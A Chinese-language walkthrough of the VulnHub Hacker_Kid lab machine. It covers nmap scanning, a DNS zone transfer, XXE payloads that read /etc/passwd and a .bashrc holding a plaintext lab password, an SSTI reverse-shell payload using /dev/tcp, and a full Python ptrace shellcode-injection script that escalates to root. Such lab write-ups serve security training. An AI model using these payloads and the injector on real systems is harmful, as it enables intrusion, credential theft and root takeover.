Hacker_Kid靶场实战

https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova

nmap -sP 192.168.106.0/24  #对自己的靶机网段进行存活探测，获取靶机地址nmap -T4 -A -p- 192.168.106.129  #对目标进行全端口扫描

通过探测发现目标开启了53、80、9999端口提示使用dig访问发现存在php环境

查看源码发现一段注释，提示使用GET参数page_no访问该页面fuzz这个参数为21时，出现了新的页面http://192.168.106.129/index.php?page_no=21

发现一个域名：hackers.blackhat.local修改hosts绑定域名访问域名后发现页面没有发现变化

尝试使用DNS域传送漏洞进行探测dig axfr @192.168.106.129 blackhat.local发现了新的域名mail.blackhat.localhackerkid.blackhat.localhacker.blackhat.local.blackhat.localwww.blackhat.local添加到hosts文件中

通过访问发现新的页面通过抓包进行注册发现数据使用的xml格式进行传输，尝试是否存在xxe漏洞<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>

通过测试发现存在xxe漏洞发现root、saket具有登录权限使用PHP封装器读取/home/saket/.bashrc文件<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=/home/saket/.bashrc'>]>.bashrc是home目录下的一个shell文件，用于储存用户的个性化设置。在bash每次启动时都会加载.bashrc文件中的内容，并根据内容定制当前bash的配置和环境。

# ~/.bashrc: executed by bash(1) for non-login shells.# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)# for examples
# If not running interactively, don't do anythingcase $- in    *i*) ;;      *) return;;esac
# don't put duplicate lines or lines starting with space in the history.# See bash(1) for more optionsHISTCONTROL=ignoreboth
# append to the history file, don't overwrite itshopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)HISTSIZE=1000HISTFILESIZE=2000
# check the window size after each command and, if necessary,# update the values of LINES and COLUMNS.shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will# match all files and zero or more directories and subdirectories.#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then    debian_chroot=$(cat /etc/debian_chroot)fi
# set a fancy prompt (non-color, unless we know we "want" color)case "$TERM" in    xterm-color|*-256color) color_prompt=yes;;esac
# uncomment for a colored prompt, if the terminal has the capability; turned# off by default to not distract the user: the focus in a terminal window# should be on the output of commands, not on the prompt#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then  # We have color support; assume it's compliant with Ecma-48  # (ISO/IEC-6429). (Lack of such support is extremely rare, and such  # a case would tend to support setf rather than setaf.)  color_prompt=yes    else  color_prompt=    fifi
if [ "$color_prompt" = yes ]; then    PS1='${debian_chroot:+($debian_chroot)}[33[01;32m]u@h[33[00m]:[33[01;34m]w[33[00m]$ 'else    PS1='${debian_chroot:+($debian_chroot)}u@h:w$ 'fiunset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dircase "$TERM" inxterm*|rxvt*)    PS1="[e]0;${debian_chroot:+($debian_chroot)}u@h: wa]$PS1"    ;;*)    ;;esac
# enable color support of ls and also add handy aliasesif [ -x /usr/bin/dircolors ]; then    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"    alias ls='ls --color=auto'    #alias dir='dir --color=auto'    #alias vdir='vdir --color=auto'
    alias grep='grep --color=auto'    alias fgrep='fgrep --color=auto'    alias egrep='egrep --color=auto'fi
# colored GCC warnings and errors#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# some more ls aliasesalias ll='ls -alF'alias la='ls -A'alias l='ls -CF'
# Add an "alert" alias for long running commands.  Use like so:#   sleep 10; alertalias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '''s/^s*[0-9]+s*//;s/[;&|]s*alert$//''')"'
# Alias definitions.# You may want to put all your additions into a separate file like# ~/.bash_aliases, instead of adding them here directly.# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then    . ~/.bash_aliasesfi
# enable programmable completion features (you don't need to enable# this, if it's already enabled in /etc/bash.bashrc and /etc/profile# sources /etc/bash.bashrc).if ! shopt -oq posix; then  if [ -f /usr/share/bash-completion/bash_completion ]; then    . /usr/share/bash-completion/bash_completion  elif [ -f /etc/bash_completion ]; then    . /etc/bash_completion  fifi
#Setting Password for running python appusername="admin"password="Saket!#$%@!!"
发现一个用户名和密码,通过admin用户登录http://192.168.106.129:9999失败尝试使用之前读取password发现的另一个用户saket登录成功

通过提示测试是否可以存在name参数浏览器访问http://192.168.106.129:9999/?name=1 存在name参数

通过对name参数测试，发现存在SSTI模板注入漏洞使用以下通杀payload：{{1+abcxyz}}${1+abcxyz}<%1+abcxyz%>[abcxyz]
针对Python:{{1+abcxyz}}针对PHP:${1+abcxyz}针对JAVA:<%1+abcxyz%>
构造反弹shell命令{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.106.128/4567 0>&1"')}}url编码后使用，本地监听4567端口，成功获取shell

查询具有cap权限的目录和文件/sbin/getcap -r / 2>/dev/null发现python2.7设置有cap_sys_ptrace+epCap权限查询系统上以root权限运行的程序ps -ef | grep root

利用下面的代码进行提权import ctypesimport sysimport struct# Macros defined in <sys/ptrace.h># https://code.woboq.org/qt5/include/sys/ptrace.h.htmlPTRACE_POKETEXT = 4PTRACE_GETREGS = 12PTRACE_SETREGS = 13PTRACE_ATTACH = 16PTRACE_DETACH = 17# Structure defined in <sys/user.h># https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_structclass user_regs_struct(ctypes.Structure):    _fields_ = [        ("r15", ctypes.c_ulonglong),        ("r14", ctypes.c_ulonglong),        ("r13", ctypes.c_ulonglong),        ("r12", ctypes.c_ulonglong),        ("rbp", ctypes.c_ulonglong),        ("rbx", ctypes.c_ulonglong),        ("r11", ctypes.c_ulonglong),        ("r10", ctypes.c_ulonglong),        ("r9", ctypes.c_ulonglong),        ("r8", ctypes.c_ulonglong),        ("rax", ctypes.c_ulonglong),        ("rcx", ctypes.c_ulonglong),        ("rdx", ctypes.c_ulonglong),        ("rsi", ctypes.c_ulonglong),        ("rdi", ctypes.c_ulonglong),        ("orig_rax", ctypes.c_ulonglong),        ("rip", ctypes.c_ulonglong),        ("cs", ctypes.c_ulonglong),        ("eflags", ctypes.c_ulonglong),        ("rsp", ctypes.c_ulonglong),        ("ss", ctypes.c_ulonglong),        ("fs_base", ctypes.c_ulonglong),        ("gs_base", ctypes.c_ulonglong),        ("ds", ctypes.c_ulonglong),        ("es", ctypes.c_ulonglong),        ("fs", ctypes.c_ulonglong),        ("gs", ctypes.c_ulonglong),    ]
libc = ctypes.CDLL("libc.so.6")
pid=int(sys.argv[1])
# Define argument type and respone type.libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]libc.ptrace.restype = ctypes.c_uint64
# Attach to the processlibc.ptrace(PTRACE_ATTACH, pid, None, None)registers=user_regs_struct()
# Retrieve the value stored in registerslibc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))print("Instruction Pointer: " + hex(registers.rip))print("Injecting Shellcode at: " + hex(registers.rip))
# Shell code copied from exploit db. https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.cshellcode = "x48x31xc0x48x31xd2x48x31xf6xffxc6x6ax29x58x6ax02x5fx0fx05x48x97x6ax02x66xc7x44x24x02x15xe0x54x5ex52x6ax31x58x6ax10x5ax0fx05x5ex6ax32x58x0fx05x6ax2bx58x0fx05x48x97x6ax03x5exffxcexb0x21x0fx05x75xf8xf7xe6x52x48xbbx2fx62x69x6ex2fx2fx73x68x53x48x8dx3cx24xb0x3bx0fx05"
# Inject the shellcode into the running process byte by byte.for i in xrange(0,len(shellcode),4):    # Convert the byte to little endian.    shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)    shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('x00').encode('hex')    shellcode_byte=int(shellcode_byte_little_endian,16)
    # Inject the byte.    libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)
print("Shellcode Injected!!")
# Modify the instuction pointerregisters.rip=registers.rip+2
# Set the registerslibc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))print("Final Instruction Pointer: " + hex(registers.rip))
# Detach from the process.libc.ptrace(PTRACE_DETACH, pid, None, None)

python2.7 exp.py  934该脚本注入成功后会启动tcp 5600端口，查看本地监听端口nc 192.168.106.129 5600成功获取root权限